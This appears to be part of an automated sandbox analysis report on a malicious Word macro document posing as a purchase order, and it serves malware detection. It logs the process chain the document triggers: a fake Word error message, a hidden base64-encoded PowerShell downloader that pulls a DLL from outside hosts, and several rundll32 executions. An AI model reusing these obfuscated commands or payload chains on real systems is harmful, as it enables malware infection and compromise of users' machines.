                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
                      Source: PO# 01222021.docInitial sample: OLE summary subject = Steel Cambridgeshire productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: PO# 01222021.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: PO# 01222021.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: PO# 01222021.docStream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
